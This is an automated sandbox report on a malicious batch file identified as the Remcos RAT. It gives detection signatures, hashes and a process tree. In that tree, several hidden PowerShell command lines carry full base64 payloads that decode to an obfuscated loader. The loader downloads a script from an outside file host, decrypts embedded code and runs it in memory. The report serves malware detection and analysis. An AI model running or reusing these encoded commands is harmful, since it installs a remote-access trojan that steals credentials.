
Windows Analysis Report
tOpxHK0Z2U.bat

Overview

General Information

Sample name: tOpxHK0Z2U.bat (renamed because original name is a hash value)
Original sample name: 883fc875fce3e9a54f8eb6025c50560f800adc146d616422c2db1bb47b7cc5e4.bat
Analysis ID: 1612239
MD5: 890f45d950b48b371048ddce0b66790b
SHA1: f69a74cab519f7bcb5b41d81b0f908d44e4c6013
SHA256: 883fc875fce3e9a54f8eb6025c50560f800adc146d616422c2db1bb47b7cc5e4
Tags: abokirem-duckdns-org, bat, user-JAMESWT_MHT

Detection

Remcos
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains a sample name check
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 7472 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tOpxHK0Z2U.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7560 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\tOpxHK0Z2U.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7612 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 7936 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\eguw" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 7944 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\gaaojdm" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 7964 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qunhkwxnio" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 8056 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8b2957c5.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8136 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8b2957c5.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4532 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 5560 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4f0470de.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6468 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4f0470de.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3376 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 7684 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4d1fbf4c.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 736 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4d1fbf4c.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3656 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 3528 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e8e451c5.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4356 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e8e451c5.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7536 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 5184 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ea7b3dab.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7960 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ea7b3dab.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2940 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 4172 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_516e4705.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6608 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_516e4705.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5332 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 6824 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cdf83743.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7672 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cdf83743.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7096 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 3208 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_7b316f35.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6224 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_7b316f35.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7100 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 1144 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0b65a00e.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2860 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0b65a00e.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2540 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 6644 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6c687774.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1564 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6c687774.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5568 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNz
aUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkdmFseGspLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRxenkgaW4gJG5zYnR1KSB7CWlmICgkcXp5LlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRrcmNmYT0kcXp5LlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRjZXpqbT1bc3RyaW5nW11dJGtyY2ZhLlNwbGl0KCdcJyk7SUVYICckdWltZXk9ZW11cnUgKHRibnhmIChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGNlemptWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHlseGFnPWVtdXJ1ICh0Ym54ZiAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRjZXpqbVsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtpbmZkZSAkdWltZXkgJG51bGw7aW5mZGUgJHlseGFnICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 2456 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_03a3688f.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6284 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_03a3688f.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8008 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 6804 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_95d3f0d3.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3844 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_95d3f0d3.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4188 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 5576 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e74002f.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8168 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e74002f.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7272 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNz
